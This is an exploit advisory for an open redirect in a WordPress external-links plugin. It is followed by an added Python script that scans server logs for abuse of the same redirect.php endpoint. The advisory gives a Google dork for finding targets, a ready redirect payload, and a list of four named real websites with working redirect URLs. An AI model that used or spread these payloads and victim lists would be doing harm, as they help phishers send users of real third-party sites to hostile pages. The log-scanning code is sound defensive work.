- ####################################################################
- # Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : finewebdev.com
- # Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
- downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
- # Software Information Link : wordpress.org/plugins/wp-external-links/
- # Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''
- # Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- “WP External Links (nofollow new tab seo)” is open source software.
- Manage external and internal links on your site.
- ####################################################################
- # Impact :
- ***********
- WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
- because the application fails to properly verify user-supplied input.
- Exploiting this issue may allow attackers to redirect users to arbitrary web sites
- and conduct phishing attacks; other attacks are also possible.
- WordPress Plugin WP Js External Link Info versions 1.21 - 1.81 and 2.2.0 are
- vulnerable; prior versions may also be affected.
- ####################################################################
- # Open Redirection Exploit :
- **********************
- /wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com
- [+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com
- [+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/
- [+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
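For site owners checking whether the redirect.php endpoint described above has been used against their visitors, the following added example (not part of the original advisory or the plugin's code) scans web server access log lines for requests whose url parameter points off-site. The combined log format, the own-host set and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint path from the advisory; endswith() also matches subdirectory installs.
REDIRECT_PATH = "/wp-content/plugins/wp-js-external-link-info/redirect.php"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')  # request field


def external_target(request_target, own_hosts):
    """Return the off-site host a redirect.php request points at, else None.

    A url value without a host is a relative, same-site path and is ignored.
    """
    path, _, query = request_target.partition("?")
    if not path.endswith(REDIRECT_PATH):
        return None
    # parse_qs percent-decodes the value; "\" is normalised to "/" because
    # browsers treat the two alike in the authority part of a URL.
    for value in parse_qs(query).get("url", []):
        try:
            host = urlsplit(value.strip().replace("\\", "/")).hostname
        except ValueError:
            return "<unparseable>"  # malformed authority: review by hand
        if host and host not in own_hosts:
            return host
    return None


def scan(log_lines, own_hosts):
    """Return [(line_number, host)] for requests that redirect off-site."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        host = external_target(match.group(1), own) if match else None
        if host:
            hits.append((number, host))
    return hits


# Constructed sample lines (documentation IP, example.* domains).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Feb/2019:10:00:01 +0000] "GET ' + t + ' HTTP/1.1" 302 0'
    for t in (
        REDIRECT_PATH + "?url=https://phish.example.net/login",
        REDIRECT_PATH + "?url=https://blog.example.org/about",
        "/wp" + REDIRECT_PATH + "?url=%2F%2Fcdn.example.com%2Fx",
        REDIRECT_PATH + "?url=/contact",
    )
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG, {"blog.example.org"}))
```

Hits from referrers you do not recognise, or bursts of distinct destination hosts, are the ones to follow up; removing or updating the plugin closes the endpoint itself.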